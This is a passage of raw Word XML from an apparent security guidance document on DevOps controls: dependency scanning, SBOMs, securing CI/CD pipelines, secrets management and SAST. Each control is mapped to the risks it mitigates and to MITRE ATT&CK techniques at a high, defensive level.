        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310618AA" w14:textId="745BD3ED" w:rsidR="00EC40F9" w:rsidRPr="00E53977" w:rsidRDefault="00EC40F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="441"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC40F9">
        <w:t xml:space="preserve">compromise client software binary (T1554) embedding </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EC40F9">
        <w:t>backdoors</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EC40F9">
        <w:t xml:space="preserve"> in compiled libraries that persist across application updates.</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7B39F3FB" w:rsidR="005B17C6" w:rsidRPr="00E53977" w:rsidRDefault="005B17C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Establish continuous dependency security </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3AA28B" w14:textId="035DB775" w:rsidR="005B17C6" w:rsidRPr="00E53977" w:rsidRDefault="005B17C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Establish comprehensive visibility and SBOM generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7996ADFB" w14:textId="74106BF1" w:rsidR="005B17C6" w:rsidRPr="00E53977" w:rsidRDefault="005B17C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">industry-standard formats (SPDX, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>CycloneDX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>) for regulatory compliance and incident response readiness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5BF09C" w14:textId="3C94DF22" w:rsidR="005B17C6" w:rsidRPr="009702A7" w:rsidRDefault="005B17C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="009702A7">
        <w:t>Implement automated vulnerability scanning and remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007CD095" w14:textId="7DFB048E" w:rsidR="005B17C6" w:rsidRPr="00E53977" w:rsidRDefault="005B17C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>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security update capabilities that generate pull requests with dependency version upgrades, including compatibility testing and intelligent merge conflict resolution to reduce manual remediation burden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2146BC6E" w14:textId="6FE5ED2B" w:rsidR="005B17C6" w:rsidRPr="00E53977" w:rsidRDefault="005B17C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Integrate security validation into development workflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E9DA76" w14:textId="16BCAEF0" w:rsidR="005B17C6" w:rsidRPr="00E53977" w:rsidRDefault="005B17C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Integrate dependency security validation directly into development workflows through pull request reviews that automatically assess security impact of dependency changes-flagging new dependencies with known vulnerabilities, license compliance issues, or suspicious characteristics (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>typosquatting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>,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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Extend visibility to production environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616AE0EA" w14:textId="3DB7E555" w:rsidR="005B17C6" w:rsidRPr="00E53977" w:rsidRDefault="005B17C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>Dependabot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w: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102" w:name="_Toc242449565"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Shift left the security controls</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w14:paraId="52AB2A68" w14:textId="56C6E58D" w:rsidR="005B17C6" w:rsidRPr="00E53977" w:rsidRDefault="005B17C6" w:rsidP="005B17C6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc242449566"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>DS-3: Secure the DevOps infrastructure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w14:paraId="58C6F23F" w14:textId="17509231" w:rsidR="005B17C6" w:rsidRPr="00E53977" w:rsidRDefault="005B17C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6264539D" w14:textId="5AD86CC4" w:rsidR="00A4669A" w:rsidRPr="00E53977" w:rsidRDefault="005B17C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Implement defense in depth for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>build</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">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03E6ACF9" w14:textId="64914A86" w:rsidR="005B17C6" w:rsidRPr="00E53977" w:rsidRDefault="005B17C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4E339588" w14:textId="4898A5E3" w:rsidR="005B17C6" w:rsidRPr="00E53977" w:rsidRDefault="005B17C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Compromised CI/CD pipelines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B85A60E" w14:textId="253908FD" w:rsidR="005B17C6" w:rsidRPr="00E53977" w:rsidRDefault="005B17C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Attackers gain access to build pipelines through stolen credentials, exploited vulnerabilities, or insider access, enabling code </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>injection</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>, artifact tampering, or deployment manipulation that affects all downstream consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C849840" w14:textId="2D75D5AA" w:rsidR="005B17C6" w:rsidRPr="00E53977" w:rsidRDefault="005B17C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Exposed secrets in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>build</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> logs and artifacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2463D61E" w14:textId="18ABABB5" w:rsidR="005B17C6" w:rsidRPr="00E53977" w:rsidRDefault="005B17C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unauthorized pipeline modifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E38D1EE" w14:textId="7D1B1A39" w:rsidR="001E10E3" w:rsidRPr="00E53977" w:rsidRDefault="001E10E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Lack of change control and approval workflows allows malicious actors to modify pipeline definitions, inject malicious build steps, or alter deployment configurations without detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489BF582" w14:textId="2602AACC" w:rsidR="001E10E3" w:rsidRPr="00E53977" w:rsidRDefault="001E10E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Insufficient access controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFFD47B" w14:textId="34328C2F" w:rsidR="001E10E3" w:rsidRPr="00E53977" w:rsidRDefault="001E10E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="288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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Insecure build agents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F8133A" w14:textId="043BD7F6" w:rsidR="001E10E3" w:rsidRPr="00E53977" w:rsidRDefault="001E10E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="288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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Missing audit trails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D8B6D5" w14:textId="78FC90D6" w:rsidR="001E10E3" w:rsidRPr="00E53977" w:rsidRDefault="001E10E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Inadequate logging and monitoring of DevOps activities prevents detection of unauthorized access, suspicious modifications, or insider threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC53FEE" w14:textId="1871B41C" w:rsidR="001E10E3" w:rsidRPr="00E53977" w:rsidRDefault="001E10E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6231CE4F" w14:textId="5BAF2949" w:rsidR="001E10E3" w:rsidRDefault="001E10E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3BA0A0" w14:textId="52688D4E" w:rsidR="00EC40F9" w:rsidRPr="00E53977" w:rsidRDefault="00EC40F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="442"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC40F9">
        <w:lastRenderedPageBreak/>
        <w:t>valid accounts (T1078) using stolen credentials or service principal secrets to access DevOps platforms and pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E21859" w14:textId="52145A20" w:rsidR="001E10E3" w:rsidRDefault="001E10E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B05979" w14:textId="3FF7F263" w:rsidR="00EC40F9" w:rsidRPr="00E53977" w:rsidRDefault="00EC40F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="442"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC40F9">
        <w:t xml:space="preserve">account manipulation (T1098) creating backdoor service </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EC40F9">
        <w:t>principals</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EC40F9">
        <w:t>, personal access tokens, or SSH keys for maintained access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECA24B1" w14:textId="0919F15A" w:rsidR="001E10E3" w:rsidRDefault="001E10E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F44AD99" w14:textId="3C37B857" w:rsidR="00EC40F9" w:rsidRPr="00E53977" w:rsidRDefault="00EC40F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="442"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC40F9">
        <w:t>unsecured credentials (T1552.001) harvesting secrets from pipeline logs, environment variables, or configuration files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51861BF5" w14:textId="43173486" w:rsidR="001E10E3" w:rsidRDefault="001E10E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27904176" w14:textId="729FB0C9" w:rsidR="00EC40F9" w:rsidRPr="00E53977" w:rsidRDefault="00EC40F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="442"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC40F9">
        <w:t>impair defenses (T1562) disabling security scanning steps, audit logging, or approval gates in pipeline definitions.</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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Configure secrets management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31835078" w14:textId="1DC357E3" w:rsidR="001E10E3" w:rsidRPr="00E53977" w:rsidRDefault="001E10E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Eliminate hardcoded credentials with centralized storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1690E7EF" w14:textId="6136B7BB" w:rsidR="001E10E3" w:rsidRPr="00E53977" w:rsidRDefault="001E10E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Eliminate hardcoded credentials from pipeline definitions and source code by centralizing all secrets in dedicated secret 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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Configure dynamic secret retrieval with managed identities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238B1E7B" w14:textId="2B0958DE" w:rsidR="001E10E3" w:rsidRPr="00E53977" w:rsidRDefault="001E10E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enforce just-in-time access with approval gates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74577FBD" w14:textId="6D8A2BBF" w:rsidR="001E10E3" w:rsidRPr="00E53977" w:rsidRDefault="001E10E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Enforce just-in-time secret access patterns where secrets are retrieved only when needed, with automatic revocation after </w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Establish layered infrastructure access controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5526E1B1" w14:textId="28E48B41" w:rsidR="00C736D7" w:rsidRPr="00E53977" w:rsidRDefault="00C736D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>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accessing secrets outside their intended scope, and deploy hardened self-hosted build agents with network isolation for sensitive workloads. Integrate infrastructure-as-code security scanning into pipelines to prevent deployment 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104" w:name="_Toc242449567"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>DS-4: Integrate Static Application Security Testing (SAST)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w14:paraId="13184831" w14:textId="3118F77F" w:rsidR="00650181" w:rsidRPr="00E53977" w:rsidRDefault="00650181">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753053D8" w14:textId="6B149F69" w:rsidR="00650181" w:rsidRPr="00E53977" w:rsidRDefault="00650181">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>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analysis to identify and block vulnerabilities before they reach production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455045E0" w14:textId="6778EDB6" w:rsidR="00650181" w:rsidRPr="00E53977" w:rsidRDefault="00650181">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="49EA2B65" w14:textId="355F488E" w:rsidR="00650181" w:rsidRPr="00E53977" w:rsidRDefault="00650181">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Injection vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D0EBF1" w14:textId="1C105692" w:rsidR="00650181" w:rsidRPr="00E53977" w:rsidRDefault="00650181">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>injection</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">, cross-site scripting (XSS), command </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>injection</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>, and LDAP injection flaws enable attackers to manipulate application logic, extract sensitive data, or execute arbitrary code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B671EB6" w14:textId="2517311D" w:rsidR="00650181" w:rsidRPr="00E53977" w:rsidRDefault="00650181">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Hardcoded credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B91B7A" w14:textId="0185978B" w:rsidR="00650181" w:rsidRPr="00E53977" w:rsidRDefault="00650181">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="288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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Insecure cryptographic implementations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF2BD6F" w14:textId="2C9FB823" w:rsidR="00650181" w:rsidRPr="00E53977" w:rsidRDefault="00650181">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="288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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Buffer overflows and memory corruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469D58A9" w14:textId="7B5DA0D3" w:rsidR="002D04AE" w:rsidRPr="00E53977" w:rsidRDefault="002D04AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unsafe memory operations in C/C++ applications enable arbitrary code execution, privilege escalation, and denial of service attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750C6E38" w14:textId="536234FF" w:rsidR="002D04AE" w:rsidRPr="00E53977" w:rsidRDefault="002D04AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Business logic flaws</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B902511" w14:textId="7542887C" w:rsidR="002D04AE" w:rsidRPr="00E53977" w:rsidRDefault="002D04AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Authentication bypasses, authorization gaps, race conditions, and insufficient input validation enable privilege escalation, fraud, and unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B752777" w14:textId="2092D3E4" w:rsidR="002D04AE" w:rsidRPr="00E53977" w:rsidRDefault="002D04AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Infrastructure as Code (</w:t>
      </w:r>
